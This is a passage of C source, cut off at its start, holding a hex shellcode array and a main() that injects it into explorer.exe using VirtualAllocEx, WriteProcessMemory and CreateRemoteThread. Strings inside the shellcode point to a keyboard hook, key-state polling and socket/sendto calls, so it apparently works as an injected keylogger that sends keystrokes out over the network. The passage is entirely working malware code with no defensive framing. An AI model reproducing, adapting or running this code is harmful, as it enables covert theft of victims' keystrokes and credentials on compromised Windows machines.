8\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3"; int main() { HANDLE s,proc; PROCESSENTRY32 ps; BOOL process_found=0; LPVOID shell; SIZE_T total; //finding explorer.exe pid ps.dwSize=sizeof(ps); s=CreateToolhelp32Snapshot(2,0); if(s==INVALID_HANDLE_VALUE) { printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError()); return -1; } if(!Process32First(s,&ps)) { printf("Process32First() failed.Error code %d\n",GetLastError()); return -1; } do{ if(0==strcmp(ps.szExeFile,"explorer.exe")) { process_found=1; break; } }while(Process32Next(s,&ps)); if(!process_found) { printf("Unknown Process\n"); return -1; } //opening process using pid proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID); if(proc==INVALID_HANDLE_VALUE) { printf("OpenProcess() failed.Error code %d\n",GetLastError()); return -1; } //allocating memory process memory if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL) { printf("Failed to allocate memory into process"); CloseHandle(proc); return -1; } //writing shellcode into process memory WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total); if(sizeof(shellcode)!=total) { printf("Failed write shellcode into process memory"); CloseHandle(proc); return -1; } //Executing shellcode if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL) { printf("Failed to Execute shellcode"); CloseHandle(proc); return -1; } CloseHandle(proc); CloseHandle(s); return 0; }